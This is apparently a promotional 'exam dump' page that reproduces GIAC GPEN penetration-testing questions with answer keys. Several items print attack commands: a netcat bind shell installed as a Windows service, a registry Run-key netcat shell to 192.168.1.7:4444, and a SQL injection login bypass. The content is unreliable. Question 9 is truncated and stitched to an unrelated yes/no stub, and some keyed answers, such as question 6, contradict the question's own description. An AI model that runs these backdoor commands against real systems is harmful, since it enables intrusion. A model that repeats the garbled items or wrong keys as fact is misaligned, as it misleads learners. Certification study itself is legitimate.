
Free Instant Download NEW GPEN Exam Dumps (PDF & VCE):
Available on: https://www.certleader.com/GPEN-dumps.html


Act now and download your GIAC GPEN test today! Do not waste time on worthless GIAC GPEN tutorials. Download the up-to-date GIAC Certified Penetration Tester exam with real questions and answers and begin to learn GIAC GPEN with a classic professional.

Free GPEN dump questions follow:

NEW QUESTION 1

Which of the following are the countermeasures against WEP cracking? Each correct answer represents a part of the solution. Choose all that apply.

  • A. Using a 16 bit SSID.
  • B. Changing keys often.
  • C. Using the longest key supported by hardware.
  • D. Using a non-obvious key.

Answer: BCD

NEW QUESTION 2

Which of the following statements are true about NTLMv1?
Each correct answer represents a complete solution. Choose all that apply.

  • A. It uses the LANMAN hash of the user's password.
  • B. It is mostly used when no Active Directory domain exists.
  • C. It is a challenge-response authentication protocol.
  • D. It uses the MD5 hash of the user's password.

Answer: ABC

NEW QUESTION 3

Which of the following nmap switches is used to perform ICMP netmask scanning?

  • A. -PM
  • B. -PB
  • C. -PI
  • D. -PS

Answer: A

NEW QUESTION 4

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. On the We-are-secure login page, he enters ='or''=' as a username and successfully logs in to the user page of the Web site. The We-are-secure login page is vulnerable to a __________.

  • A. Replay attack
  • B. Land attack
  • C. SQL injection attack
  • D. Dictionary attack

Answer: C

NEW QUESTION 5

John works as a professional Ethical Hacker. He is assigned a project to test the security of www.we-are-secure.com. He has to ping 500 computers to find out whether these computers are connected to the server or not. Which of the following will he use to ping these computers?

  • A. PING
  • B. TRACEROUTE
  • C. Ping sweeping
  • D. NETSTAT

Answer: C

NEW QUESTION 6

While reviewing traffic from a tcpdump capture, you notice the following commands being sent from a remote system to one of your web servers:
C:\>sc \\internet.host.com create ncservice binpath= "c:\tools\nc.exe -l -p 2222 -e cmd.exe"
C:\>sc \\internet.host.com query ncservice
What is the intent of the commands?

  • A. The first command creates a backdoor shell as a service. It is being started on TCP 2222 using cmd.exe. The second command verifies the service is created and its status.
  • B. The first command creates a backdoor shell as a service. It is being started on UDP 2222 using cmd.exe. The second command verifies the service is created and its status.
  • C. This creates a service called ncservice which is linked to the cmd.exe command and is designed to stop any instance of nc.exe being run. The second command verifies the service is created and its status.
  • D. The first command verifies the service is created and its status. The second command creates a backdoor shell as a service. It is being started on TCP 2222 connected to cmd.exe.

Answer: C

NEW QUESTION 7

Which of the following techniques are NOT used to perform active OS fingerprinting?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Analyzing email headers
  • B. Sniffing and analyzing packets
  • C. ICMP error message quoting
  • D. Sending FIN packets to open ports on the remote system

Answer: AB

NEW QUESTION 8

John works as a Professional Ethical Hacker for we-are-secure Inc. The company is using a wireless network. John has been assigned to check the security of the we-are-secure WLAN. For this, he tries to capture the traffic; however, he does not find good traffic to analyze. He has already discovered the network using the ettercap tool. Which of the following tools can he use to generate traffic so that he can crack the WEP keys and enter the network?

  • A. ICMP ping flood tool
  • B. Kismet
  • C. Netstumbler
  • D. AirSnort

Answer: A

NEW QUESTION 9

You successfully compromise a target system's web application using blind command injection. The command you injected is ping -n 1 192.168.1.200. Assuming your machine is


Solution:


Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 10

You suspect that a firewall or IPS exists between you and the target machine. Which nmap option will elicit responses from some firewalls and IPSs while being silently dropped by the target, thus confirming the existence of a firewall or IPS?

  • A. --traceroute
  • B. --firewalk
  • C. --badsum
  • D. --SF

Answer: B

NEW QUESTION 11

You run the following command on the remote Windows Server 2003 computer:
C:\>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

  • A. You want to put Netcat in the stealth mode.
  • B. You want to add the Netcat command to the Windows registry.
  • C. You want to perform banner grabbing.
  • D. You want to set the Netcat to execute command any time.

Answer: ABD

NEW QUESTION 12

You are using the dsniff tool to intercept communications between two entities and establish credentials with both sides of the connections. These entities do not notice that you were retrieving the information between these two. Which of the following attacks are you performing?

  • A. Man-in-the-middle
  • B. ARP poisoning
  • C. Session hijacking
  • D. DoS

Answer: A

NEW QUESTION 13

You suspect that system administrators in one part of the target organization are turning off their systems during the times when penetration tests are scheduled. What feature could you add to the 'Rules of engagement' that could help your team test that part of the target organization?

  • A. Unannounced test
  • B. Tell response personnel the exact time the test will occur
  • C. Test systems after normal business hours
  • D. Limit tests to business hours

Answer: C

NEW QUESTION 14

You want to retrieve password files (stored in the Web server's index directory) from various Web sites. Which of the following tools can you use to accomplish the task?

  • A. Sam spade
  • B. Nmap
  • C. Whois
  • D. Google

Answer: D

NEW QUESTION 15

Adam, a malicious hacker, hides a hacking tool from a system administrator of his company by using the Alternate Data Streams (ADS) feature. Which of the following statements is true in the context of the above scenario?

  • A. Adam is using NTFS file system.
  • B. Alternate Data Streams is a feature of Linux operating system.
  • C. Adam is using FAT file system.
  • D. Adam's system runs on Microsoft Windows 98 operating system.

Answer: A

NEW QUESTION 16

Which of the following is a tool for SSH and SSL MITM attacks?

  • A. Ettercap
  • B. Cain
  • C. Dsniff
  • D. AirJack

Answer: C

NEW QUESTION 17

What happens when you scan a broadcast IP address of a network?
Each correct answer represents a complete solution. Choose all that apply.

  • A. It leads to scanning of all the IP addresses on that subnet at the same time.
  • B. It will show an error in the scanning process.
  • C. It may show smurf DoS attack in the network IDS of the victim.
  • D. Scanning of the broadcast IP address cannot be performed.

Answer: AC

NEW QUESTION 18

You have been contracted to penetration test an e-mail server for a client that wants to know for sure if the sendmail service is vulnerable to any known attacks. You have permission to run any type of test. How will you proceed to give the client the most valid answer?

  • A. Run all known sendmail exploits against the server and see if you can compromise the service, even if it crashed the machine or service
  • B. Run a banner grabbing vulnerability checker to determine the sendmail version and patch level, then look up and report all the vulnerabilities that exist for that version and patch level
  • C. Run all sendmail exploits that will not crash the server and see if you can compromise the service
  • D. Log into the e-mail and determine the sendmail version and patch level, then look up and report all the vulnerabilities that exist for that version and patch level

Answer: C

NEW QUESTION 19
......
